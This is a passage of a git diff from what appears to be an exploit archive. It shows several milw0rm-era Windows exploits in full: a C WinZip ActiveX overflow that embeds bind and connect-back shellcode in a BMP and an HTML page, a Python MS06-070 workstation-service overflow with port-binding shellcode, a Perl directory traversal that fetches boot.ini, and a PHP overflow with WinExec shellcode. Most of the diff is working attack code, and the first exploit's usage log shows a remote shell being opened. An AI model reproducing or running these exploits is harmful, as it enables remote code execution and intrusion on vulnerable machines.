+ * $ ./prdelka-vs-MS-winzip -f index.html -i foo.bmp -s 0 -t 0
+ * [ WinZip <= 10.0.7245 FileView ActiveX overflow exploit
+ * [ Using shellcode 'Win32 x86 bind() shellcode (4444/tcp default)' (400 bytes)
+ * [ Using target 'WinXP SP2(en) WinZIP 10.0.6667'
+ * [ Creating image containing shellcode 'foo.bmp'
+ * [ Creating html exploit page 'index.html'
+ * $
+ * ... clicky clicky MSIE ...
+ * $ telnet 192.168.1.223 4444
+ * Connected to 192.168.1.223.
+ * Escape character is '^]'.
+ * 
+ * Microsoft Windows XP [Version 5.1.2600]
+ * (C) Copyright 1985-2001 Microsoft Corp.
+ * 
+ * C:\Documents and Settings\User\Desktop>
+ *
+ * - prdelka
+ */
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#define NOPSIZE 999999
+
+struct target {
+        char* name;
+        int retaddr;
+};
+
+struct shellcode {
+        char* name;
+        short port;
+        int host;
+        char* shellcode;
+};
+
+int targetno = 1;
+
+struct target targets[] = {
+        {"WinXP SP2(en) WinZIP 10.0.6667",0x02DA3269}
+	/* IE 6.0.2900.2180.xp_sp2_gdr.050301-1519 WZ 10.0(6667)" */
+};
+
+int shellno = 2;
+
+struct shellcode shellcodes[] = {
+        {"Win32 x86 bind() shellcode (4444/tcp default)",162,-1,
+        "\x48\x40\xf5\x49\xd6\x4a\xf9\x91\x47\x96\x2f\xf8\x9b\x37\x41\xf5"
+        "\x99\x47\xf9\xf9\xfc\xf9\x48\x4e\x4b\x9b\x90\x9b\xf5\x97\x40\xf9"
+        "\xd6\x41\xf9\x48\x9b\x92\xfd\x9b\x49\x42\x4f\x9f\x90\xd6\x27\x9b"
+        "\x93\x46\x2f\x90\xfd\x4a\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b"
+        "\x81\x73\x13\xbc\xe8\x2b\x27\x83\xeb\xfc\xe2\xf4\x3d\x2c\x7f\xd5"
+        "\x43\x17\xd7\x4d\x57\xa5\xc3\xde\x43\x17\xd4\x47\x37\x84\x0f\x03"
+        "\x37\xad\x17\xac\xc0\xed\x53\x26\x53\x63\x64\x3f\x37\xb7\x0b\x26"
+        "\x57\xa1\xa0\x13\x37\xe9\xc5\x16\x7c\x71\x87\xa3\x7c\x9c\x2c\xe6"
+        "\x76\xe5\x2a\xe5\x57\x1c\x10\x73\x98\xc0\x5e\xc2\x37\xb7\x0f\x26"
+        "\x57\x8e\xa0\x2b\xf7\x63\x74\x3b\xbd\x03\x28\x0b\x37\x61\x47\x03"
+        "\xa0\x89\xe8\x16\x67\x8c\xa0\x64\x8c\x63\x6b\x2b\x37\x98\x37\x8a"
+        "\x37\xa8\x23\x79\xd4\x66\x65\x29\x50\xb8\xd4\xf1\xda\xbb\x4d\x4f"
+        "\x8f\xda\x43\x50\xcf\xda\x74\x73\x43\x38\x43\xec\x51\x14\x10\x77"
+        "\x43\x3e\x74\xae\x59\x8e\xaa\xca\xb4\xea\x7e\x4d\xbe\x17\xfb\x4f"
+        "\x65\xe1\xde\x8a\xeb\x17\xfd\x74\xef\xbb\x78\x74\xff\xbb\x68\x74"
+        "\x43\x38\x4d\x4f\xad\xb4\x4d\x74\x35\x09\xbe\x4f\x18\xf2\x5b\xe0"
+        "\xeb\x17\xfd\x4d\xac\xb9\x7e\xd8\x6c\x80\x8f\x8a\x92\x01\x7c\xd8"
+        "\x6a\xbb\x7e\xd8\x6c\x80\xce\x6e\x3a\xa1\x7c\xd8\x6a\xb8\x7f\x73"
+        "\xe9\x17\xfb\xb4\xd4\x0f\x52\xe1\xc5\xbf\xd4\xf1\xe9\x17\xfb\x41"
+        "\xd6\x8c\x4d\x4f\xdf\x85\xa2\xc2\xd6\xb8\x72\x0e\x70\x61\xcc\x4d"
+        "\xf8\x61\xc9\x16\x7c\x1b\x81\xd9\xfe\xc5\xd5\x65\x90\x7b\xa6\x5d"
+        "\x84\x43\x80\x8c\xd4\x9a\xd5\x94\xaa\x17\x5e\x63\x43\x3e\x70\x70"
+        "\xee\xb9\x7a\x76\xd6\xe9\x7a\x76\xe9\xb9\xd4\xf7\xd4\x45\xf2\x22"
+        "\x72\xbb\xd4\xf1\xd6\x17\xd4\x10\x43\x38\xa0\x70\x40\x6b\xef\x43"
+        "\x43\x3e\x79\xd8\x6c\x80\x55\xff\x5e\x9b\x78\xd8\x6a\x17\xfb\x27"},
+        {"Win32 x86 connect() shellcode (4444/tcp default)",167,160,
+        "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+        "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+        "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+        "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+        "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+        "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+        "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+        "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+        "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+        "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
+        "\x01\x02\x03\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xec\xf9"
+        "\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
+        "\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
+        "\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
+        "\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
+        "\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
+        "\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
+        "\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"}
+};
+
+char html1[]="\r\n\r\n\r\n\r\n"
+	     "\r\n\r\n\r\n\r\n\r"
+	     "\n\r\n\r\n";
+
+
+char bmphdr[]="\x42\x4d\x3e\xbb\x2d\x00\x00\x00\x00\x00\x36\x00\x00"
+	      "\x00\x28\x00\x00\x00\xe7\x03\x00\x00\xe7\x03\x00\x00"
+	      "\x01\x00\x18\x00\x00\x00\x00\x00\x08\xbb\x2d\x00\x00"
+	      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+	      "\x00\x00";
+int ret;
+
+void help(char* progname){
+	int count;
+	printf("[ Usage instructions.\n[\n");
+	printf("[ %s  (optional)\n[\n[   --filename|-f \n",progname);
+	printf("[   --imgname|-i \n[   --shellcode|-s \n");
+	printf("[   --shellport|-p (port)\n");
+	printf("[   --shellhost|-i (ip)\n");
+	printf("[   --target|-t \n[\n");
+	printf("[ Target#'s\n");
+	for(count = 0;count <= targetno - 1;count++){
+        	printf("[ %d %s 0x%x\n",count,targets[count],targets[count]);
+	}
+	printf("[\n[ Shellcode#'s\n");
+	for(count = 0;count <= shellno - 1;count++){
+        	printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode));
+	}
+	exit(0);
+}
+
+void setret(char* retarg){
+	int value = atoi(retarg);
+	switch(value){
+		case 0:
+			printf("[ Using target '%s'\n",targets[ret].name);
+			ret = targets[ret].retaddr;
+			break;
+		default:
+			ret = strtoul(retarg,NULL,16);
+			printf("[ Using return address '0x%x'\n",ret);
+			break;
+	}
+}
+
+int main(int argc, char* argv[]){
+	unsigned long i, fd;
+	int c, index, payg, paya, lhost;
+	short shellport, shellport2;
+	int ishell = 0, itarg = 0;
+	char *buffer, *file, *img, *payload;
+        static struct option options[] = {
+                {"filename", 1, 0, 'f'},
+                {"imgname", 1, 0, 'i'},
+                {"target", 1, 0, 't'},
+                {"shellcode", 1, 0, 's'},
+                {"shellport", 1, 0, 'p'},
+                {"shellhost", 1, 0, 'd'},
+                {"help", 0, 0,'h'}
+        };
+	printf("[ WinZip <= 10.0.7245 FileView ActiveX overflow exploit\n");
+        while(c != -1){
+		c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
+		switch(c){
+			case 'f':
+				file = optarg;
+				break;
+			case 'i':
+				img = optarg;
+				break;
+			case 't':
+				itarg = 1;
+				setret(optarg);
+				if(strlen((char*)&ret) < 4){
+					fprintf(stderr,"[ Selected target contains a null address!\n");	
+					exit(-1);
+				}
+				break;
+			case 's':
+                                if(ishell==0){
+                                payg = atoi(optarg);
+				switch(payg){
+                                case 0:
+                               		printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
+                                        payload = malloc(strlen(shellcodes[payg].shellcode)+1);
+                                        memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
+                                        memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
+                                        shellport2 = 4444;
+                                        ishell = 1;
+                                        break;
+                                case 1:
+                                	printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
+                                	payload = malloc(strlen(shellcodes[payg].shellcode)+1);
+                                	memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
+                                	memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
+                                	shellport2 = 4444;
+                                	ishell = 1;
+                                	break;
+                                default:
+                                        printf("[ Invalid shellcode selection %d\n",payg);
+                                        exit(0);
+                                        break;
+				}
+				}
+				break;
+			case 'p':
+                                if(ishell==1){
+                                        if(shellcodes[payg].port > -1){
+                                                paya = strlen(payload);
+                                                shellport = atoi(optarg);
+                                                shellport2 = shellport;
+                                                shellport =(shellport&0xff)<<8 | shellport>>8;
+                                                memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
+                                                if(paya > strlen(payload)) {
+                                                        printf("[ Error shellcode port introduces null bytes\n");
+                                                        exit(1);
+                                                }
+						printf("[ Shellcode port changed to '%u'\n",atoi(optarg));
+                                        }
+                                        else{
+                                                printf("[ (%s) port selection is ignored for current shellcode\n",optarg);
+                                        }
+                                }
+                                else{
+                                        printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg);
+                                }
+				break;
+			case 'd':
+			        if(ishell==1){
+                                	if(shellcodes[payg].host > -1){
+                              			paya = strlen(payload);
+                                		lhost = inet_addr(optarg);
+                                		memcpy((void*)&payload[shellcodes[payg].host],&lhost,sizeof(lhost));
+                                		if(paya > strlen(payload)){
+                                			printf("[ Error shellhost introduces null bytes\n");
+                                			exit(1);
+                                		}
+						printf("[ Shellhost has been changed to '%s'\n",optarg);
+                                	}
+                                	else{
+                                		printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg);
+                                	}
+                               	}
+                                else {
+                                	printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg);
+                                }
+				break;
+			case 'h':
+				help(argv[0]);
+				break;
+			default:
+				break;
+		}
+	}
+	if(ishell==0||itarg==0||strlen(file)==0||strlen(img)==0){
+		printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]);
+		exit(0);
+	}
+
+// create image
+	printf("[ Creating image containing shellcode '%s'\n",img);
+	fd = open(img,O_RDWR|O_CREAT,S_IRWXU);
+	if(fd == -1){
+		fprintf(stderr,"[ Error creating %s\n",file);
+		exit(-1);
+	}
+	write(fd,bmphdr,sizeof(bmphdr));
+	for(i = 0;i < NOPSIZE;i++){
+		write(fd,"\x90",1);
+	}
+	write(fd,payload,strlen(payload));
+	close(fd);
+
+// create html
+	printf("[ Creating html exploit page '%s'\n",file);
+	fd = open(file,O_RDWR|O_CREAT,S_IRWXU);
+        if(fd == -1){
+		fprintf(stderr,"[ Error creating %s\n",file);
+                exit(-1);
+        }
+	write(fd,html1,strlen(html1));
+	for(i = 0;i < 265;i++){
+		write(fd,"A",1);
+	}
+	write(fd,&ret,4);
+	for(i = 0;i < 1827;i++){
+		write(fd,"A",1);
+	}
+	write(fd,html2,strlen(html2));
+	write(fd,img,strlen(img));
+	write(fd,html3,strlen(html3));
+        close(fd);
+}
+
+// milw0rm.com [2006-11-15]
diff --git a/platforms/windows/remote/2809.py b/platforms/windows/remote/2809.py
index 434902ba6..e97b4509d 100755
--- a/platforms/windows/remote/2809.py
+++ b/platforms/windows/remote/2809.py
@@ -1,104 +1,104 @@
-#!/usr/bin/python
-# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
-# Tested on windows 2000 server SP4
-#
-# Usage: python NetAPI-NetrJoinDomain2.py  
-# Requires a domain controller on the network (configure samba as DC)
-# Requires python and impacket
-#
-# Winny M Thomas ;-)
-
-
-from impacket.dcerpc import transport
-from impacket import uuid
-import sys
-import socket
-import struct
-
-def DCEconnectAndExploit(target, domain):
-       baselen = 3708
-
-       stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
-       stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
-
-       print 'Connecting to named pipe (wkssvc)'
-       trans = transport.DCERPCTransportFactory(stringbinding)
-       trans.connect()
-       print 'Setting up DCE transport'
-       dce = trans.DCERPC_class(trans)
-       dce.bind(uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a','1.0')))
-
-       print 'Sending attack payload to target'
-       #NetrJoinDomain2 data: Hostname
-       query1 =  "\xaa\xbb\xcc\xdd"
-       query1 += "\x07\x00\x00\x00"
-       query1 += "\x00\x00\x00\x00"
-       query1 += "\x07\x00\x00\x00"
-       query1 += "\x5C\x00\x5C\x00"
-       query1 += "\x41\x00\x55\x00"
-       query1 += "\x58\x00\x37\x00"
-       query1 += "\x00\x00\x00\x00"
-
-       #NetrJoinDomain2 data: Domain/Hostname
-
-       targetd = '\x00'.join(list(domain)) + '\x00'
-       Len = baselen + len(domain)
-       query2 =  struct.pack('L', Len)
-       query2 += struct.pack('L', 0)
-       query2 += struct.pack('L', Len)
-       query2 += targetd
-
-       query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90"
-       query3 += "\x90\x90" * 1058
-       query3 += "\xEB\x06" #6 byte jump from current pointer in ebx
-       query3 += "\x27\x16\xE1\x77" #Address from user32.dll (0x77E11627)
-       #350 byte port binding shellcode
-       query3 += "\x90\x90\x90\x90\x90\x90"
-       query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
-       query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
-       query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
-       query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
-       query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
-       query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
-       query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
-       query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
-       query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
-       query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
-       query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
-       query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
-       query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
-       query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
-       query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
-       query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
-       query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
-       query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
-       query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
-       query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
-       query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
-       query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
-       query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
-       query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
-       query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce";
-       query3 += "\x90\x90" * 2467
-       query3 += "\x00\x00"
-
-       query3 += "\x00\x00\x00\x00"
-       query3 += "\x00\x00\x00\x00"
-       query3 += "\x00\x00\x00\x00"
-       query3 += "\x00\x00"
-       query3 += "\x01\x00\x00\x00"
-
-       query = query1 + query2 + query3
-       dce.call(0x16, query)
-
-if __name__ == '__main__':
-       try:
-               target = sys.argv[1]
-               domain = sys.argv[2]
-       except IndexError:
-               print 'Usage: %s  ' % sys.argv[0]
-               sys.exit(-1)
-
-       DCEconnectAndExploit(target, domain)
-
-# milw0rm.com [2006-11-18]
+#!/usr/bin/python
+# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
+# Tested on windows 2000 server SP4
+#
+# Usage: python NetAPI-NetrJoinDomain2.py  
+# Requires a domain controller on the network (configure samba as DC)
+# Requires python and impacket
+#
+# Winny M Thomas ;-)
+
+
+from impacket.dcerpc import transport
+from impacket import uuid
+import sys
+import socket
+import struct
+
+def DCEconnectAndExploit(target, domain):
+       baselen = 3708
+
+       stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]"
+       stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
+
+       print 'Connecting to named pipe (wkssvc)'
+       trans = transport.DCERPCTransportFactory(stringbinding)
+       trans.connect()
+       print 'Setting up DCE transport'
+       dce = trans.DCERPC_class(trans)
+       dce.bind(uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a','1.0')))
+
+       print 'Sending attack payload to target'
+       #NetrJoinDomain2 data: Hostname
+       query1 =  "\xaa\xbb\xcc\xdd"
+       query1 += "\x07\x00\x00\x00"
+       query1 += "\x00\x00\x00\x00"
+       query1 += "\x07\x00\x00\x00"
+       query1 += "\x5C\x00\x5C\x00"
+       query1 += "\x41\x00\x55\x00"
+       query1 += "\x58\x00\x37\x00"
+       query1 += "\x00\x00\x00\x00"
+
+       #NetrJoinDomain2 data: Domain/Hostname
+
+       targetd = '\x00'.join(list(domain)) + '\x00'
+       Len = baselen + len(domain)
+       query2 =  struct.pack('L', Len)
+       query2 += struct.pack('L', 0)
+       query2 += struct.pack('L', Len)
+       query2 += targetd
+
+       query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90"
+       query3 += "\x90\x90" * 1058
+       query3 += "\xEB\x06" #6 byte jump from current pointer in ebx
+       query3 += "\x27\x16\xE1\x77" #Address from user32.dll (0x77E11627)
+       #350 byte port binding shellcode
+       query3 += "\x90\x90\x90\x90\x90\x90"
+       query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
+       query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
+       query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
+       query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
+       query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
+       query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
+       query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
+       query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
+       query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
+       query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
+       query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
+       query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
+       query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
+       query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
+       query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
+       query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
+       query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
+       query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
+       query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
+       query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
+       query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
+       query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
+       query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
+       query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
+       query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce";
+       query3 += "\x90\x90" * 2467
+       query3 += "\x00\x00"
+
+       query3 += "\x00\x00\x00\x00"
+       query3 += "\x00\x00\x00\x00"
+       query3 += "\x00\x00\x00\x00"
+       query3 += "\x00\x00"
+       query3 += "\x01\x00\x00\x00"
+
+       query = query1 + query2 + query3
+       dce.call(0x16, query)
+
+if __name__ == '__main__':
+       try:
+               target = sys.argv[1]
+               domain = sys.argv[2]
+       except IndexError:
+               print 'Usage: %s  ' % sys.argv[0]
+               sys.exit(-1)
+
+       DCEconnectAndExploit(target, domain)
+
+# milw0rm.com [2006-11-18]
diff --git a/platforms/windows/remote/2866.html b/platforms/windows/remote/2866.html
index 91e2c1b4e..3af8d7542 100755
--- a/platforms/windows/remote/2866.html
+++ b/platforms/windows/remote/2866.html
@@ -1,17 +1,17 @@
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2006-11-30]
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2006-11-30]
diff --git a/platforms/windows/remote/293.c b/platforms/windows/remote/293.c
index 6f07141ca..a32eda979 100755
--- a/platforms/windows/remote/293.c
+++ b/platforms/windows/remote/293.c
@@ -195,6 +195,6 @@ WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
 FreeLibrary(hNetapi); 
 
 return 0;
-}
-
-// milw0rm.com [2004-04-24]
+}
+
+// milw0rm.com [2004-04-24]
diff --git a/platforms/windows/remote/295.c b/platforms/windows/remote/295.c
index d631ce749..a65e3fb4a 100755
--- a/platforms/windows/remote/295.c
+++ b/platforms/windows/remote/295.c
@@ -518,6 +518,6 @@ printf("OK\n");
 len = recv(sockfd, recvbuf, 1600, 0);
 
 return 0;
-}
-
-// milw0rm.com [2004-04-29]
+}
+
+// milw0rm.com [2004-04-29]
diff --git a/platforms/windows/remote/297.c b/platforms/windows/remote/297.c
index 37ae1dbff..6d4f62e1b 100755
--- a/platforms/windows/remote/297.c
+++ b/platforms/windows/remote/297.c
@@ -308,6 +308,6 @@ if (pid) wait(&pid);
 
 exit(0);
 }
-
-
-// milw0rm.com [2004-05-16]
+
+
+// milw0rm.com [2004-05-16]
diff --git a/platforms/windows/remote/2974.pl b/platforms/windows/remote/2974.pl
index e2009eaa8..875e9ff0d 100755
--- a/platforms/windows/remote/2974.pl
+++ b/platforms/windows/remote/2974.pl
@@ -1,21 +1,21 @@
-# Http explorer Web Server 1.02 Directory Transversal Vulnerability
-# http://sourceforge.net/projects/http-explorer/
-# Test:  http://[site]/../../../../ || http://[site]/../
-# /str0ke
-
-use LWP::Simple;
-use strict;
-
-sub usage
-{
-    print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
-    print "str0ke (milw0rm.com)\n";
-    print "Usage: $0 www.example.com\n";
-    exit ();
-}
-
-my $host= shift || &usage;
-
-getprint "http://" . $host . "/../../../../../../../../boot.ini";
-
-# milw0rm.com [2006-12-21]
+# Http explorer Web Server 1.02 Directory Transversal Vulnerability
+# http://sourceforge.net/projects/http-explorer/
+# Test:  http://[site]/../../../../ || http://[site]/../
+# /str0ke
+
+use LWP::Simple;
+use strict;
+
+sub usage
+{
+    print "Http explorer Web Server 1.02 Directory Transversal Vulnerability\n";
+    print "str0ke (milw0rm.com)\n";
+    print "Usage: $0 www.example.com\n";
+    exit ();
+}
+
+my $host= shift || &usage;
+
+getprint "http://" . $host . "/../../../../../../../../boot.ini";
+
+# milw0rm.com [2006-12-21]
diff --git a/platforms/windows/remote/3037.php b/platforms/windows/remote/3037.php
index 5b61c3a75..0004e66ed 100755
--- a/platforms/windows/remote/3037.php
+++ b/platforms/windows/remote/3037.php
@@ -1,84 +1,84 @@
- http://sourceforge.net/projects/durian/
-
-*/
-
-error_reporting(E_ALL);
-$address = "192.168.1.3";
-$service_port = "4002";
-
-$shellcode =
-"\xeb\x1b".
-"\x5b".
-"\x31\xc0".
-"\x50".
-"\x31\xc0".
-"\x88\x43\x59".
-"\x53".
-"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
-"\xff\xd3".
-"\x31\xc0".
-"\x50".
-"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
-"\xff\xd3".
-"\xe8\xe0\xff\xff\xff".
-"\x63\x6d\x64".
-"\x2e".
-"\x65".
-"\x78\x65".
-"\x20\x2f".
-"\x63\x20".
-"cmd.exe /c start notepad & ";
-
-//$eip="\x72\xe0\xf1\x00";//DEP disabled
-$eip="\x72\xe0\xf2\x00";
-
-$ch  =array("\xaa","\xa0","\x41");
-$size=array(30,70,150,330,520,700,1400,2300);
-
-    for ($j=0; $j
-
-# milw0rm.com [2006-12-29]
+ http://sourceforge.net/projects/durian/
+
+*/
+
+error_reporting(E_ALL);
+$address = "192.168.1.3";
+$service_port = "4002";
+
+$shellcode =
+"\xeb\x1b".
+"\x5b".
+"\x31\xc0".
+"\x50".
+"\x31\xc0".
+"\x88\x43\x59".
+"\x53".
+"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
+"\xff\xd3".
+"\x31\xc0".
+"\x50".
+"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
+"\xff\xd3".
+"\xe8\xe0\xff\xff\xff".
+"\x63\x6d\x64".
+"\x2e".
+"\x65".
+"\x78\x65".
+"\x20\x2f".
+"\x63\x20".
+"cmd.exe /c start notepad & ";
+
+//$eip="\x72\xe0\xf1\x00";//DEP disabled
+$eip="\x72\xe0\xf2\x00";
+
+$ch  =array("\xaa","\xa0","\x41");
+$size=array(30,70,150,330,520,700,1400,2300);
+
+    for ($j=0; $j
+
+# milw0rm.com [2006-12-29]
diff --git a/platforms/windows/remote/3055.html b/platforms/windows/remote/3055.html
index fcd1c6aeb..29e51cb31 100755
--- a/platforms/windows/remote/3055.html
+++ b/platforms/windows/remote/3055.html
@@ -1,55 +1,55 @@
-
-
-
-
-
-
-                                                                                                                    
-                                      
-
-
-
-# milw0rm.com [2006-12-31]
+
+
+
+
+
+
+                                                                                                                    
+                                      
+
+
+
+# milw0rm.com [2006-12-31]
diff --git a/platforms/windows/remote/3058.html b/platforms/windows/remote/3058.html
index 28f763908..849ce4779 100755
--- a/platforms/windows/remote/3058.html
+++ b/platforms/windows/remote/3058.html
@@ -1,49 +1,49 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2006-12-31]
+
+
+
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2006-12-31]
diff --git a/platforms/windows/remote/3063.pl b/platforms/windows/remote/3063.pl
